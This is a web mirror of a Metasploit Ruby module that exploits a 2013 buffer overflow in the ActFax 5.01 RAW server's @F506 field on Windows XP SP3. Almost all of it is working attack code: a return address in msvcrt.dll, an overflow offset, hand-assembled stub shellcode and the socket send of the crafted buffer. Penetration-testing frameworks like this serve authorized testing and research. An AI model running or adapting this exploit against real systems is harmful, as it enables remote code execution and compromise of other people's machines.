CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/actfax_raw_server_bof.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'		=> 'ActFax 5.01 RAW Server Buffer Overflow',

14
      'Description'	=> %q{

15
          This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW

16
        Server can be used to transfer fax messages without any underlying protocols. To

17
        note significant fields in the fax being transferred, like the fax number or the

18
        recipient, ActFax data fields can be used. This module exploits a buffer overflow

19
        in the handling of the @F506 fields due to the insecure usage of strcpy. This

20
        module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).

21
      },

22
      'License'		=> MSF_LICENSE,

23
      'Author'		=>

24
        [

25
          'Craig Freyman', # @cd1zz # discovery and Metasploit module

26
          'corelanc0d3r', # Metasploit module

27
          'juan vazquez' # Metasploit module cleanup

28
        ],

29
      'References'	=>

30
        [

31
          [ 'OSVDB', '89944' ],

32
          [ 'BID', '57789' ],

33
          [ 'EDB', '24467' ],

34
          [ 'URL', 'http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html' ]

35
        ],

36
      'Platform'	=> 'win',

37
      'Payload'	=>

38
        {

39
          'BadChars' => (0x00..0x1f).to_a.pack("C*") + "\x40",

40
          'DisableNops' => true,

41
          'Space' => 1024,

42
          'EncoderOptions' =>

43
            {

44
              'BufferRegister' => 'ECX'

45
            }

46
        },

47
      'Targets'		 =>

48
        [

49
          [ 'ActFax 5.01 / Windows XP SP3',

50
            {

51
              'Ret'   	=>	0x77c35459, # push esp # ret # msvcrt.dll

52
              'Offset'	=>	1024

53
            }

54
          ],

55
        ],

56
      'Privileged'	 => false,

57
      'DisclosureDate' => '2013-02-05',

58
      'DefaultTarget'	 => 0))

59


60
  end

61


62
  def exploit

63
    connect

64
    p = payload.encoded

65
    buffer = p

66
    buffer << rand_text(target['Offset'] - p.length)

67
    buffer << [target.ret].pack("V")

68
    buffer << "\x89\xe1" # mov ecx, esp

69
    buffer << "\x81\xC1\xFC\xFB\xFF\xFF" # add ecx, -1028

70
    buffer << "\x81\xC4\x6C\xEE\xFF\xFF" # add esp, -4500

71
    buffer << "\xE9\xE9\xFB\xFF\xFF" # jmp $-1042

72
    print_status("Trying target #{target.name}...")

73
    sock.put("@F506 "+buffer+"@\r\n\r\n")

74
    disconnect

75
  end

76
end

77


78


79